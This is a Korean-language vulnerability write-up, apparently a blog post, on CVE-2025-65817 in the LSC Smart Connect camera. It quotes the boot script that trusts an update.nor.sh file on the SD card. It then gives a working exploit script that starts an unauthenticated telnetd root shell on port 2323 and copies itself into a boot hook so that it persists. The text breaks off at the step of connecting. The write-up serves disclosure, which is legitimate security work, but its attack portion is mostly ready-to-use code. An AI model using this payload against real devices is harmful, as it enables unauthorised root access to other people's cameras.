
여기 CVE-2025-65817이 있습니다
| 필드 | 값 |
|---|---|
| 제목 | 취약점 보고서: LSC Smart Connect Camera |
| 날짜 | 2024-02-15 |
| 설명 | SD 카드 업데이트 훅을 악용하여 LSC Smart Connect 카메라에서 원격 셸을 생성. |
| 태그 | iot, 취약점, cve |
| 펌웨어 | 1.14.13 |
발견된 취약점은 start_app.sh의 업데이트 시스템, 특히 SD 카드 마운트와 update.nor.sh 파일을 이용하는 것입니다.
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"
local/sbin/start_app.sh:50–99 부분은 SD 카드에 있는 update.nor.sh 라는 이름의 파일을 무조건 신뢰합니다. 부팅 과정에서 스크립트는:
update.nor.sh를 /tmp/update.nor.sh로 복사하며,나중에 시작 시퀀스(local/sbin/start_app.sh:108–129)에서 복사된 파일은:
이 실행은 메인 ipc_service가 시작되기 전에 발생하므로, 스크립트는 네트워킹 유틸리티, 워치독 함수, 업그레이드 헬퍼가 이미 사용 가능한 최고 권한 환경에서 실행됩니다.
익스플로잇은 셸을 생성하고 카메라에 있는 telnetd를 통해 포트를 여는 방식입니다:
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]
SD 카드에 .sh 스크립트를 작성하고 update.nor.sh로 이름을 지정하기만 하면 됩니다.
제가 선택한 익스플로잇은:
#!/bin/sh
telnetd -l /bin/sh -p 2323 &
echo "Telnet start by update.nor.sh" > /tmp/exploit_success
cp /mnt/update.nor.sh /mnt/config/hook-boot.sh
date > /tmp/exploit_time
포트가 열린 것을 확인합니다.

telnet으로 연결합니다:
